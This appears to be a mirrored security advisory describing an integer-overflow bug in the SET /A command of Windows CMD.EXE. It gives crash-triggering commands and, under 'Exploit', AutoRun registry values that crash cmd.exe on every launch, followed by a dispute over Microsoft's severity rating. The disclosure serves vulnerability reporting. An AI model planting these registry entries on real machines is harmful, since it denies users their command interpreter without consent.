Exploit for Microsoft CMD.EXE Integer Overflow

Name: Exploit for Microsoft CMD.EXE Integer Overflow
Rating: 5 (164 reviews)
2022-05-11 | CVSS -0.1
## https://sploitus.com/exploit?id=PACKETSTORM:167049
Hi @ll,  
  
the subject says it all: a 25 year old TRIVIAL signed integer  
arithmetic bug (which may well have earned a PhD now) crashes  
Windows' command interpreter CMD.exe via its builtin SET command.  
See their documentation:  
<https://technet.microsoft.com/en-us/library/cc771320.aspx>  
<https://technet.microsoft.com/en-us/library/cc754250.aspx>  
  
  
Classification  
~~~~~~~~~~~~~~  
  
<https://cwe.mitre.org/data/definitions/190.html>  
CWE-190: Integer Overflow or Wraparound  
  
<https://cwe.mitre.org/data/definitions/248.html>  
CWE-248: Uncaught Exception  
  
  
Demonstration  
~~~~~~~~~~~~~  
  
On Windows NT4 or any newer version start the command interpreter and  
run the following 4 command lines (the first 3 set just the base):  
  
SET /A -2147483648  
SET /A ~2147483647  
SET /A ~2147483647 / -1  
SET /A ~2147483647 % -1  
  
[1] Oops: although a valid signed 32-bit integer, the command interpreter  
reports the literal value -2147483648 = 2**31 alias INT_MIN as  
"Invalid number. Numbers are limited to 32-bits of precision."  
  
[2] As expected, ~2147483647, the negation of INT_MAX, yields INT_MIN  
  
[3] Also as expected, computing the quotient of INT_MIN / -1 produces  
"Invalid number. Numbers are limited to 32-bits of precision.": the  
correct result is +2147483648 alias INT_MAX + 1, i.e. produces a  
integer overflow, which raises a #DE (divide error) exception on  
x86/x64 processors (and their 8- and 16-bit predecessors too).  
  
[4] OUCH: rather unexpected, computing the remainder of INT_MIN / -1  
crashes the command processor with the #DE exception, i.e.  
the developers failed to implement the check they used for  
division.  
  
JFTR: the remainder of <any integer> % -1 as well as <any integer> % 1  
is (by the algebraic definition of division) 0 (in words: ZERO):  
the remainder is in magnitude less than the divisor.  
The only integer that is in magnitude less than |-1| = 1 is 0!  
  
  
Exploit  
~~~~~~~  
  
Setting one or both of the following documented registry entries  
crashes the command interpreter upon invocation (unless started  
with the switch /D):  
  
[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]  
"AutoRun"="SET /A ~2147483647 % ~0"  
  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]  
"AutoRun"="SET /A ~2147483647 % ~0"  
  
  
stay tuned  
Stefan Kanthak  
  
PS: I reported this bug as DoS to the MSRC; they replied with the  
following bullshit statement in their 2nd sentence:  
  
| Though engineering confirmed the crash in this case, it was assessed  
| as a Low severity DoS.  
| Their reasoning centers around the requirement to have admin  
| privileges to pull off the attack.  
  
OUCH! Unprivileged users can but write this registry entry below  
[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]